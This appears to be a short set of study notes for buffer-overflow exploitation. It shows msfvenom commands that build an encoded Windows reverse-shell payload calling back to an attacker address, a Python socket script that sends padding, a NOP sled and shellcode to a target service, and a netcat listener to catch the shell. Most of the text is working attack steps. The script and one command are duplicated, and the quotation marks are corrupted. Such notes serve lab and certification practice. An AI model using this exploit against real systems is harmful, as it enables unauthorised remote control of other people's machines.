Generating Shellcode and Gaining shell
- Generate reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=<my ip> LPORT=4444 -f c -e x86/shikata_ga_nai -b "\x00ā
-f c for filetype in c
-b ā\x00ā for bad characters if there is more badchars than \x00 then added it here
- Add payload and NOP or padding \x90 in the script.py and change the IP value to target machine.
Final script
š
import socket, sys
username = "test"
payload = (<reverse_shell_payload>)
message = āAā * <offset location> + ā<reverse_format_value>ā + ā\x90ā * 32 + payload
try:
print("Sending payload...")
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<target_machine_ip>',<port>))
s.recv(1024)
s.send(username + '\r\n')
s.recv(1024)
s.send(message + '\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
username = "test"
payload = (<reverse_shell_payload>)
message = āAā * <offset location> + ā<reverse_format_value>ā + ā\x90ā * 32 + payload
try:
print("Sending payload...")
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<target_machine_ip>',<port>))
s.recv(1024)
s.send(username + '\r\n')
s.recv(1024)
s.send(message + '\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
- nc -nvlp 4444
- Run the script
Will receive reverse shell successfully
š”
Note:- the above payload shutdown the whole webprocess when reverse shell is terminated but in some case we need to terminate only a thread of web server or program , In such case use EXITFUNC=THREAD like
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC=thread -f c āe x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3dā
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC=thread -f c āe x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3dā